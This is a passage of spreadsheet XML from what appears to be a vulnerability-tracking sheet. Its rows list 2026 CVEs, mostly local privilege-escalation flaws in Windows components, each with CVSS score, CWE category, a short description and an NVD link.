          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L842" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="C843" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E843" s="5" t="inlineStr"/>
      <c r="F843" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G843" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H843" s="5" t="inlineStr"/>
      <c r="I843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L843" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69790</t>
        </is>
      </c>
      <c r="C844" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E844" s="5" t="inlineStr"/>
      <c r="F844" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G844" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L844" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69799</t>
        </is>
      </c>
      <c r="C845" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E845" s="5" t="inlineStr"/>
      <c r="F845" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G845" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H845" s="5" t="inlineStr"/>
      <c r="I845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L845" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69801</t>
        </is>
      </c>
      <c r="C846" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E846" s="5" t="inlineStr"/>
      <c r="F846" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G846" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H846" s="5" t="inlineStr"/>
      <c r="I846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L846" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69821</t>
        </is>
      </c>
      <c r="C847" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E847" s="5" t="inlineStr"/>
      <c r="F847" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G847" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L847" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69822</t>
        </is>
      </c>
      <c r="C848" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E848" s="5" t="inlineStr"/>
      <c r="F848" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G848" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H848" s="5" t="inlineStr"/>
      <c r="I848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L848" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69841</t>
        </is>
      </c>
      <c r="C849" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E849" s="5" t="inlineStr"/>
      <c r="F849" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G849" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L849" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69844</t>
        </is>
      </c>
      <c r="C850" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E850" s="5" t="inlineStr"/>
      <c r="F850" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G850" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H850" s="5" t="inlineStr"/>
      <c r="I850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L850" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69864</t>
        </is>
      </c>
      <c r="C851" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E851" s="5" t="inlineStr"/>
      <c r="F851" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G851" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L851" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69907</t>
        </is>
      </c>
      <c r="C852" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E852" s="5" t="inlineStr"/>
      <c r="F852" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G852" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H852" s="5" t="inlineStr"/>
      <c r="I852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="L852" s="5" t="inlineStr">
        <is>
          <t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69921</t>
        </is>
      </c>
      <c r="C853" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E853" s="5" t="inlineStr"/>
      <c r="F853" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G853" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H853" s="5" t="inlineStr"/>
      <c r="I853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L853" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="C854" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E854" s="5" t="inlineStr"/>
      <c r="F854" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G854" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H854" s="5" t="inlineStr"/>
      <c r="I854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L854" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="C855" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E855" s="5" t="inlineStr"/>
      <c r="F855" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G855" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H855" s="5" t="inlineStr"/>
      <c r="I855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L855" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="C856" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E856" s="5" t="inlineStr"/>
      <c r="F856" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G856" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H856" s="5" t="inlineStr"/>
      <c r="I856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L856" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="C857" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E857" s="5" t="inlineStr"/>
      <c r="F857" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G857" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L857" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="C858" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E858" s="5" t="inlineStr"/>
      <c r="F858" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G858" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J858" s="5" t="inlineStr"/>
      <c r="K858" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="L858" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70583</t>
        </is>
      </c>
      <c r="C859" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E859" s="5" t="inlineStr"/>
      <c r="F859" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G859" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L859" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70584</t>
        </is>
      </c>
      <c r="C860" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E860" s="5" t="inlineStr"/>
      <c r="F860" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G860" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H860" s="5" t="inlineStr"/>
      <c r="I860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L860" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="C861" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E861" s="5" t="inlineStr"/>
      <c r="F861" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G861" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H861" s="5" t="inlineStr"/>
      <c r="I861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L861" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="C862" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E862" s="5" t="inlineStr"/>
      <c r="F862" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G862" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H862" s="5" t="inlineStr"/>
      <c r="I862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="L862" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="C863" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E863" s="5" t="inlineStr"/>
      <c r="F863" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G863" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H863" s="5" t="inlineStr"/>
      <c r="I863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L863" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71345</t>
        </is>
      </c>
      <c r="C864" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E864" s="5" t="inlineStr"/>
      <c r="F864" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G864" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H864" s="5" t="inlineStr"/>
      <c r="I864" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L864" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72929</t>
        </is>
      </c>
      <c r="C865" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E865" s="5" t="inlineStr"/>
      <c r="F865" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G865" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H865" s="5" t="inlineStr"/>
      <c r="I865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="L865" s="5" t="inlineStr">
        <is>
          <t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="C866" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E866" s="5" t="inlineStr"/>
      <c r="F866" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G866" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H866" s="5" t="inlineStr"/>
      <c r="I866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J866" s="5" t="inlineStr"/>
      <c r="K866" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L866" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72944</t>
        </is>
      </c>
      <c r="C867" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E867" s="5" t="inlineStr"/>
      <c r="F867" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G867" s="5" t="inlineStr">
